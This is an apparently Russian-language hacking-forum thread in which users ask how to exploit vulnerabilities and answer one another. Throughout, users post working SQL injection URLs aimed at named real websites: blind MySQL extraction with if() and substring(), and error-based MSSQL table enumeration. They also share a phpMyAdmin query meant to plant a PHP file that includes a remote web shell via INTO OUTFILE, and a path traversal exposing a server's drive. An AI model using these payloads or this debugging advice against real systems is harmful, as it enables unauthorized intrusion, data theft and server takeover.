могу просматривать весь комп: http://badisow.49.212-215.is74.ru/userdir/message/messread.php?tm=c://windows Что это,PHP-injection? Или просто ошибка горе-кодера в ограничении?
Есть трабла: Смог получить доступ к БД, нашел пхпмайадмин, далее пытаюсь залить шелл через запрос. Делаю так: Code: CREATE TABLE `123` (`shl` TEXT NOT NULL) TYPE = MYISAM; INSERT INTO `123` ( `shl` ) VALUES ('<?php include("тут_адрес_к_шеллу.php") ?>'); SELECT `shl` FROM `123` INTO OUTFILE ''; DROP TABLE `123` Но оказывается какой-то запрет. Denied for 'user@localhost' (имя юзера дословно не пишу). Может кто-нибудь знает в чем может быть трабла? Или запрос неправильный составляю...
2USAkid по моему ты задавая вопрос сам ответил на него для залития шелла тебе нужны права filepriv у данного юзера их нет о чем и говорит данная ошибка
У тебя условие: /?part=npcs&id=1+OR+1=(select+db_name(1)) ошибка генерится в части OR 1=(~запрос~) при выводе в результате запроса данных типа int или binary ошибка конвертации не генерится, просто не выполняется равенство. При выводе типов int, binary экспериментируй с типом левой части приравнивания (в данном случае замени единичку).
id=9'+and+1=if((version()=5),1,(select+table_name+from+information_schema.tables))/* А почему вдруг не пашет substring() ? И откуда вообще такая конструкция if() ? Хотя работает...
Да нет,я вообще говорю,что там не пашет 9'+and+substring(version(),1,1)=5/* http://www.rauchfrei-info.de/index.php?id=9'+and+1=if((version()=5),1,(select+table_name+from+information_schema.tables+limit+1,1))/*
?id=10-1 не работает ) and 1=1/* не работает ) либо просто скули нет либо просто фильтрации какая то очень странная
Да есть там скуля, работает на технологии more than 1 row http://www.rauchfrei-info.de/index.php?id=9'+and+1=if(ord(substring((select%20table_name%20from%20information_schema.tables%20limit%200,1),1,1))=67,1,(select+table_name+from+information_schema.tables))/*
2I-I00K пожно по подробнее об этом ? гугль дал результаты на анлийском (\ ecли можно ссылку что бы почитать )
С этого момента любой оффтоп в этой теме будет наказыватся отрицательной репутацией. Тема называется ваши вопросы по уязвимостям, а не "нераскрученные скули" или "продайте сплойт". О чем стоит говорить в этой теме сказано в корневом сообщении, это последние китайское предупреждение
в mssql узнал первую таблицу: content_meta_tbl, пытаюсь узнать другие: Code: http://www.site.ru/students/content.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('content_meta_tbl'))-- пишет Incorrect syntax near 'content_meta_tbl'. Поптыка узнать ячейки из этой таблица закончились также
Code: content.asp?id=1+or+1=(SELECT+TOP+2+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users')-- Incorrect syntax near 'users'. что неправильного-то в синтаксисе?(
